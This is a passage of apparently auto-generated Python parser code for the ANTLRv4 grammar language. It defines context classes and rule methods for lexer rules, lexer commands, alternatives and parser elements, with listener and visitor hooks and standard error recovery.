self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.FRAGMENT:
self.state = 381
localctx.frag = self.match(ANTLRv4Parser.FRAGMENT)
self.state = 384
localctx.name = self.match(ANTLRv4Parser.TOKEN_REF)
self.state = 385
self.match(ANTLRv4Parser.COLON)
self.state = 386
self.lexerRuleBlock()
self.state = 387
self.match(ANTLRv4Parser.SEMI)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerRuleBlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def lexerAltList(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerAltListContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerRuleBlock
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerRuleBlock" ):
listener.enterLexerRuleBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerRuleBlock" ):
listener.exitLexerRuleBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerRuleBlock" ):
return visitor.visitLexerRuleBlock(self)
else:
return visitor.visitChildren(self)
def lexerRuleBlock(self):
localctx = ANTLRv4Parser.LexerRuleBlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_lexerRuleBlock)
try:
self.enterOuterAlt(localctx, 1)
self.state = 389
self.lexerAltList()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerAltListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._lexerAlt = None # LexerAltContext
self.alts = list() # of LexerAltContexts
def lexerAlt(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.LexerAltContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.LexerAltContext,i)
def OR(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.OR)
else:
return self.getToken(ANTLRv4Parser.OR, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerAltList
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAltList" ):
listener.enterLexerAltList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAltList" ):
listener.exitLexerAltList(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAltList" ):
return visitor.visitLexerAltList(self)
else:
return visitor.visitChildren(self)
def lexerAltList(self):
localctx = ANTLRv4Parser.LexerAltListContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_lexerAltList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 391
localctx._lexerAlt = self.lexerAlt()
localctx.alts.append(localctx._lexerAlt)
self.state = 396
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OR:
self.state = 392
self.match(ANTLRv4Parser.OR)
self.state = 393
localctx._lexerAlt = self.lexerAlt()
localctx.alts.append(localctx._lexerAlt)
self.state = 398
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerAltContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def lexerElements(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerElementsContext,0)
def lexerCommands(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandsContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerAlt
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAlt" ):
listener.enterLexerAlt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAlt" ):
listener.exitLexerAlt(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAlt" ):
return visitor.visitLexerAlt(self)
else:
return visitor.visitChildren(self)
def lexerAlt(self):
localctx = ANTLRv4Parser.LexerAltContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_lexerAlt)
self._la = 0 # Token type
try:
self.state = 404
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.LEXER_CHAR_SET, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.BEGIN_ACTION, ANTLRv4Parser.LPAREN, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
self.enterOuterAlt(localctx, 1)
self.state = 399
self.lexerElements()
self.state = 401
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.RARROW:
self.state = 400
self.lexerCommands()
pass
elif token in [ANTLRv4Parser.SEMI, ANTLRv4Parser.RPAREN, ANTLRv4Parser.OR]:
self.enterOuterAlt(localctx, 2)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerElementsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._lexerElement = None # LexerElementContext
self.elements = list() # of LexerElementContexts
def lexerElement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.LexerElementContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.LexerElementContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerElements
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElements" ):
listener.enterLexerElements(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElements" ):
listener.exitLexerElements(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElements" ):
return visitor.visitLexerElements(self)
else:
return visitor.visitChildren(self)
def lexerElements(self):
localctx = ANTLRv4Parser.LexerElementsContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_lexerElements)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 407
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 406
localctx._lexerElement = self.lexerElement()
localctx.elements.append(localctx._lexerElement)
self.state = 409
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.LEXER_CHAR_SET) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.STRING_LITERAL) | (1 << ANTLRv4Parser.BEGIN_ACTION) | (1 << ANTLRv4Parser.LPAREN) | (1 << ANTLRv4Parser.DOT) | (1 << ANTLRv4Parser.NOT))) != 0)):
break
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerElement
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class LexerElementLabeledContext(LexerElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
super().__init__(parser)
self.value = None # LabeledLexerElementContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def labeledLexerElement(self):
return self.getTypedRuleContext(ANTLRv4Parser.LabeledLexerElementContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElementLabeled" ):
listener.enterLexerElementLabeled(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElementLabeled" ):
listener.exitLexerElementLabeled(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElementLabeled" ):
return visitor.visitLexerElementLabeled(self)
else:
return visitor.visitChildren(self)
class LexerElementBlockContext(LexerElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
super().__init__(parser)
self.value = None # LexerBlockContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def lexerBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerBlockContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElementBlock" ):
listener.enterLexerElementBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElementBlock" ):
listener.exitLexerElementBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElementBlock" ):
return visitor.visitLexerElementBlock(self)
else:
return visitor.visitChildren(self)
class LexerElementActionContext(LexerElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
super().__init__(parser)
self.copyFrom(ctx)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def QUESTION(self):
return self.getToken(ANTLRv4Parser.QUESTION, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElementAction" ):
listener.enterLexerElementAction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElementAction" ):
listener.exitLexerElementAction(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElementAction" ):
return visitor.visitLexerElementAction(self)
else:
return visitor.visitChildren(self)
class LexerElementAtomContext(LexerElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
super().__init__(parser)
self.value = None # LexerAtomContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def lexerAtom(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerAtomContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElementAtom" ):
listener.enterLexerElementAtom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElementAtom" ):
listener.exitLexerElementAtom(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElementAtom" ):
return visitor.visitLexerElementAtom(self)
else:
return visitor.visitChildren(self)
def lexerElement(self):
localctx = ANTLRv4Parser.LexerElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 74, self.RULE_lexerElement)
self._la = 0 # Token type
try:
self.state = 427
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,45,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.LexerElementLabeledContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 411
localctx.value = self.labeledLexerElement()
self.state = 413
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 412
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.LexerElementAtomContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 415
localctx.value = self.lexerAtom()
self.state = 417
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 416
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.LexerElementBlockContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 419
localctx.value = self.lexerBlock()
self.state = 421
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 420
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.LexerElementActionContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 423
self.actionBlock()
self.state = 425
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.QUESTION:
self.state = 424
self.match(ANTLRv4Parser.QUESTION)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LabeledLexerElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def ASSIGN(self):
return self.getToken(ANTLRv4Parser.ASSIGN, 0)
def PLUS_ASSIGN(self):
return self.getToken(ANTLRv4Parser.PLUS_ASSIGN, 0)
def lexerAtom(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerAtomContext,0)
def lexerBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerBlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_labeledLexerElement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLabeledLexerElement" ):
listener.enterLabeledLexerElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLabeledLexerElement" ):
listener.exitLabeledLexerElement(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLabeledLexerElement" ):
return visitor.visitLabeledLexerElement(self)
else:
return visitor.visitChildren(self)
def labeledLexerElement(self):
localctx = ANTLRv4Parser.LabeledLexerElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 76, self.RULE_labeledLexerElement)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 429
self.identifier()
self.state = 430
_la = self._input.LA(1)
if not(_la==ANTLRv4Parser.ASSIGN or _la==ANTLRv4Parser.PLUS_ASSIGN):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 433
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.LEXER_CHAR_SET, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
self.state = 431
self.lexerAtom()
pass
elif token in [ANTLRv4Parser.LPAREN]:
self.state = 432
self.lexerBlock()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerBlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def lexerAltList(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerAltListContext,0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerBlock
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerBlock" ):
listener.enterLexerBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerBlock" ):
listener.exitLexerBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerBlock" ):
return visitor.visitLexerBlock(self)
else:
return visitor.visitChildren(self)
def lexerBlock(self):
localctx = ANTLRv4Parser.LexerBlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 78, self.RULE_lexerBlock)
try:
self.enterOuterAlt(localctx, 1)
self.state = 435
self.match(ANTLRv4Parser.LPAREN)
self.state = 436
self.lexerAltList()
self.state = 437
self.match(ANTLRv4Parser.RPAREN)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerCommandsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def RARROW(self):
return self.getToken(ANTLRv4Parser.RARROW, 0)
def lexerCommand(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.LexerCommandContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandContext,i)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerCommands
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerCommands" ):
listener.enterLexerCommands(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerCommands" ):
listener.exitLexerCommands(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerCommands" ):
return visitor.visitLexerCommands(self)
else:
return visitor.visitChildren(self)
def lexerCommands(self):
localctx = ANTLRv4Parser.LexerCommandsContext(self, self._ctx, self.state)
self.enterRule(localctx, 80, self.RULE_lexerCommands)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 439
self.match(ANTLRv4Parser.RARROW)
self.state = 440
self.lexerCommand()
self.state = 445
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.COMMA:
self.state = 441
self.match(ANTLRv4Parser.COMMA)
self.state = 442
self.lexerCommand()
self.state = 447
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerCommandContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def lexerCommandName(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandNameContext,0)
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def lexerCommandExpr(self):
return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandExprContext,0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerCommand
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerCommand" ):
listener.enterLexerCommand(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerCommand" ):
listener.exitLexerCommand(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerCommand" ):
return visitor.visitLexerCommand(self)
else:
return visitor.visitChildren(self)
def lexerCommand(self):
localctx = ANTLRv4Parser.LexerCommandContext(self, self._ctx, self.state)
self.enterRule(localctx, 82, self.RULE_lexerCommand)
try:
self.state = 454
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,48,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 448
self.lexerCommandName()
self.state = 449
self.match(ANTLRv4Parser.LPAREN)
self.state = 450
self.lexerCommandExpr()
self.state = 451
self.match(ANTLRv4Parser.RPAREN)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 453
self.lexerCommandName()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerCommandNameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def MODE(self):
return self.getToken(ANTLRv4Parser.MODE, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerCommandName
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerCommandName" ):
listener.enterLexerCommandName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerCommandName" ):
listener.exitLexerCommandName(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerCommandName" ):
return visitor.visitLexerCommandName(self)
else:
return visitor.visitChildren(self)
def lexerCommandName(self):
localctx = ANTLRv4Parser.LexerCommandNameContext(self, self._ctx, self.state)
self.enterRule(localctx, 84, self.RULE_lexerCommandName)
try:
self.state = 458
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
self.enterOuterAlt(localctx, 1)
self.state = 456
self.identifier()
pass
elif token in [ANTLRv4Parser.MODE]:
self.enterOuterAlt(localctx, 2)
self.state = 457
self.match(ANTLRv4Parser.MODE)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerCommandExprContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def INT(self):
return self.getToken(ANTLRv4Parser.INT, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerCommandExpr
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerCommandExpr" ):
listener.enterLexerCommandExpr(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerCommandExpr" ):
listener.exitLexerCommandExpr(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerCommandExpr" ):
return visitor.visitLexerCommandExpr(self)
else:
return visitor.visitChildren(self)
def lexerCommandExpr(self):
localctx = ANTLRv4Parser.LexerCommandExprContext(self, self._ctx, self.state)
self.enterRule(localctx, 86, self.RULE_lexerCommandExpr)
try:
self.state = 462
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
self.enterOuterAlt(localctx, 1)
self.state = 460
self.identifier()
pass
elif token in [ANTLRv4Parser.INT]:
self.enterOuterAlt(localctx, 2)
self.state = 461
self.match(ANTLRv4Parser.INT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AltListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._alternative = None # AlternativeContext
self.alts = list() # of AlternativeContexts
def alternative(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.AlternativeContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.AlternativeContext,i)
def OR(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.OR)
else:
return self.getToken(ANTLRv4Parser.OR, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_altList
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAltList" ):
listener.enterAltList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAltList" ):
listener.exitAltList(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAltList" ):
return visitor.visitAltList(self)
else:
return visitor.visitChildren(self)
def altList(self):
localctx = ANTLRv4Parser.AltListContext(self, self._ctx, self.state)
self.enterRule(localctx, 88, self.RULE_altList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 464
localctx._alternative = self.alternative()
localctx.alts.append(localctx._alternative)
self.state = 469
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OR:
self.state = 465
self.match(ANTLRv4Parser.OR)
self.state = 466
localctx._alternative = self.alternative()
localctx.alts.append(localctx._alternative)
self.state = 471
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AlternativeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._element = None # ElementContext
self.elements = list() # of ElementContexts
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def element(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.ElementContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.ElementContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_alternative
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAlternative" ):
listener.enterAlternative(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAlternative" ):
listener.exitAlternative(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAlternative" ):
return visitor.visitAlternative(self)
else:
return visitor.visitChildren(self)
def alternative(self):
localctx = ANTLRv4Parser.AlternativeContext(self, self._ctx, self.state)
self.enterRule(localctx, 90, self.RULE_alternative)
self._la = 0 # Token type
try:
self.state = 481
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.BEGIN_ACTION, ANTLRv4Parser.LPAREN, ANTLRv4Parser.LT, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
self.enterOuterAlt(localctx, 1)
self.state = 473
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 472
self.elementOptions()
self.state = 476
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 475
localctx._element = self.element()
localctx.elements.append(localctx._element)
self.state = 478
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.STRING_LITERAL) | (1 << ANTLRv4Parser.BEGIN_ACTION) | (1 << ANTLRv4Parser.LPAREN) | (1 << ANTLRv4Parser.DOT) | (1 << ANTLRv4Parser.NOT))) != 0)):
break
pass
elif token in [ANTLRv4Parser.SEMI, ANTLRv4Parser.RPAREN, ANTLRv4Parser.OR, ANTLRv4Parser.POUND]:
self.enterOuterAlt(localctx, 2)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_element
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ParserElementLabeledContext(ElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
super().__init__(parser)
self.value = None # LabeledElementContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def labeledElement(self):
return self.getTypedRuleContext(ANTLRv4Parser.LabeledElementContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserElementLabeled" ):
listener.enterParserElementLabeled(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserElementLabeled" ):
listener.exitParserElementLabeled(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserElementLabeled" ):
return visitor.visitParserElementLabeled(self)
else:
return visitor.visitChildren(self)
class ParserElementBlockContext(ElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
super().__init__(parser)
self.value = None # BlockContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def block(self):
return self.getTypedRuleContext(ANTLRv4Parser.BlockContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserElementBlock" ):
listener.enterParserElementBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserElementBlock" ):
listener.exitParserElementBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserElementBlock" ):
return visitor.visitParserElementBlock(self)
else:
return visitor.visitChildren(self)
class ParserElementAtomContext(ElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
super().__init__(parser)
self.value = None # AtomContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def atom(self):
return self.getTypedRuleContext(ANTLRv4Parser.AtomContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
